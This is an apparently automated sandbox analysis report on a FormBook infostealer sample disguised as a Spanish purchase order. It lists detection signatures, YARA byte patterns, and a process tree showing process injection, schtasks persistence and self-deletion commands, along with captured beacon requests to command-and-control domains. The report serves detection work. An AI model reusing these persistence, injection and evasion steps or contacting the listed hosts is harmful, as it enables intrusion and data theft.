Loading ...

Play interactive tourEdit tour

Analysis Report Orden de compra.exe

Overview

General Information

Sample Name:Orden de compra.exe
Analysis ID:299493
MD5:3c6f98e28d6dd69ca0ec3d6cb5d7a4e6
SHA1:2ab29cdb8b68bd66df7d2dd89f9332784a6756f7
SHA256:d30e5bd3a0ec9e64eea4363751655f0267d7ffb00a9552862179cd8cf6caa6c0
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Orden de compra.exe (PID: 6460 cmdline: 'C:\Users\user\Desktop\Orden de compra.exe' MD5: 3C6F98E28D6DD69CA0EC3D6CB5D7A4E6)
    • schtasks.exe (PID: 4876 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegSvcs.exe (PID: 3924 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6792 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6788 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x66c50:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x66eba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x93470:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x936da:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x729dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x9f1fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x724c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x9ece9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x72adf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x9f2ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x72c57:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x9f477:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x678d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x940f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x71744:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9df64:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x685cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x94deb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x7884f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xa506f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x79852:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x75771:$sqlite3step: 68 34 1C 7B E1
    • 0x75884:$sqlite3step: 68 34 1C 7B E1
    • 0xa1f91:$sqlite3step: 68 34 1C 7B E1
    • 0xa20a4:$sqlite3step: 68 34 1C 7B E1
    • 0x757a0:$sqlite3text: 68 38 2A 90 C5
    • 0x758c5:$sqlite3text: 68 38 2A 90 C5
    • 0xa1fc0:$sqlite3text: 68 38 2A 90 C5
    • 0xa20e5:$sqlite3text: 68 38 2A 90 C5
    • 0x757b3:$sqlite3blob: 68 53 D8 7F 8C
    • 0x758db:$sqlite3blob: 68 53 D8 7F 8C
    • 0xa1fd3:$sqlite3blob: 68 53 D8 7F 8C
    • 0xa20fb:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.RegSvcs.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.RegSvcs.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14875:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14361:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14977:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x976a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa463:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a6e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b6ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.RegSvcs.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17609:$sqlite3step: 68 34 1C 7B E1
        • 0x1771c:$sqlite3step: 68 34 1C 7B E1
        • 0x17638:$sqlite3text: 68 38 2A 90 C5
        • 0x1775d:$sqlite3text: 68 38 2A 90 C5
        • 0x1764b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17773:$sqlite3blob: 68 53 D8 7F 8C
        4.2.RegSvcs.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.RegSvcs.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Orden de compra.exe' , ParentImage: C:\Users\user\Desktop\Orden de compra.exe, ParentProcessId: 6460, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HPQeEdeqeuYypt' /XML 'C:\Users\user\AppData\Local\Temp\tmp97AC.tmp', ProcessId: 4876

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exeReversingLabs: Detection: 16%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Orden de compra.exeReversingLabs: Detection: 16%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\HPQeEdeqeuYypt.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Orden de compra.exeJoe Sandbox ML: detected
          Source: 4.2.RegSvcs.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: global trafficHTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=TMWo0d02AqsVcbzcQa4PfklrfocQn03XGfHcC1WSt61OgbB60peilv7yFPTA9yj5spVGq3aiuA== HTTP/1.1Host: www.szysjfjx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fs8/?Iv4=ZsUpjtgdfmnFttmILyjTBY0y8wWuLtjFoZA0oAe87ERBVmsH8HUhhf6dhkcF9t1+Kkj5IXDYxA==&FHOhxv=fb64Xt6PY4 HTTP/1.1Host: www.kumcal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBvWZpEZlorh8CTmg== HTTP/1.1Host: www.computercodecamp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=TMWo0d02AqsVcbzcQa4PfklrfocQn03XGfHcC1WSt61OgbB60peilv7yFPTA9yj5spVGq3aiuA== HTTP/1.1Host: www.szysjfjx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fs8/?Iv4=ZsUpjtgdfmnFttmILyjTBY0y8wWuLtjFoZA0oAe87ERBVmsH8HUhhf6dhkcF9t1+Kkj5IXDYxA==&FHOhxv=fb64Xt6PY4 HTTP/1.1Host: www.kumcal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fs8/?FHOhxv=fb64Xt6PY4&Iv4=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2PsdnytLljzoCFBvWZpEZlorh8CTmg== HTTP/1.1Host: www.computercodecamp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.szysjfjx.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: wts/1.6.4Date: Fri, 16 Oct 2020 18:24:55 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 262Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 7a 79 73 6a 66 6a 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.szysjfjx.com Port 80</address></body></html>
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Orden de compra.exe, 00000000.00000002.342930784.0000000002481000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000002.593861267.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: wscript.exe, 00000008.00000002.595327159.000000000544F000.00000004.00000001.sdmpString found in binary or memory: http://www.computercodecamp.com?FHOhxv=fb64Xt6PY4&Iv4=U/dVVm2xwTFLDerdjbCDYRAG3ilhc39Y3/HlBm6zr75t2P
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.369865532.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wscript.exe, 00000008.00000002.595327159.000000000544F000.00000004.00000001.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.343349362.0000000003489000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.384639120.0000000000ED0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.593275380.0000000000A80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.592757667.0000000000590000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.384688401.0000000000F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.593365051.0000000000BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.383807194.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A050 NtClose,4_2_0041A050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A100 NtAllocateVirtualMemory,4_2_0041A100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419F20 NtCreateFile,4_2_00419F20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419FD0 NtReadFile,4_2_00419FD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A04A NtClose,4_2_0041A04A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A01A NtReadFile,4_2_0041A01A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041A0FA NtAllocateVirtualMemory,4_2_0041A0FA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00419FCC NtReadFile,4_2_00419FCC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF98F0 NtReadVirtualMemory,LdrInitializeThunk,4_2_00FF98F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9860 NtQuerySystemInformation,LdrInitializeThunk,4_2_00FF9860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9840 NtDelayExecution,LdrInitializeThunk,4_2_00FF9840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF99A0 NtCreateSection,LdrInitializeThunk,4_2_00FF99A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_00FF9910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9A50 NtCreateFile,LdrInitializeThunk,4_2_00FF9A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9A20 NtResumeThread,LdrInitializeThunk,4_2_00FF9A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9A00 NtProtectVirtualMemory,LdrInitializeThunk,4_2_00FF9A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF95D0 NtClose,LdrInitializeThunk,4_2_00FF95D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9540 NtReadFile,LdrInitializeThunk,4_2_00FF9540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF96E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_00FF96E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9660 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_00FF9660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF97A0 NtUnmapViewOfSection,LdrInitializeThunk,4_2_00FF97A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9780 NtMapViewOfSection,LdrInitializeThunk,4_2_00FF9780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9710 NtQueryInformationToken,LdrInitializeThunk,4_2_00FF9710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF98A0 NtWriteVirtualMemory,4_2_00FF98A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FFB040 NtSuspendThread,4_2_00FFB040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00FF9820 NtEnumerateKey,4_2_00FF9820
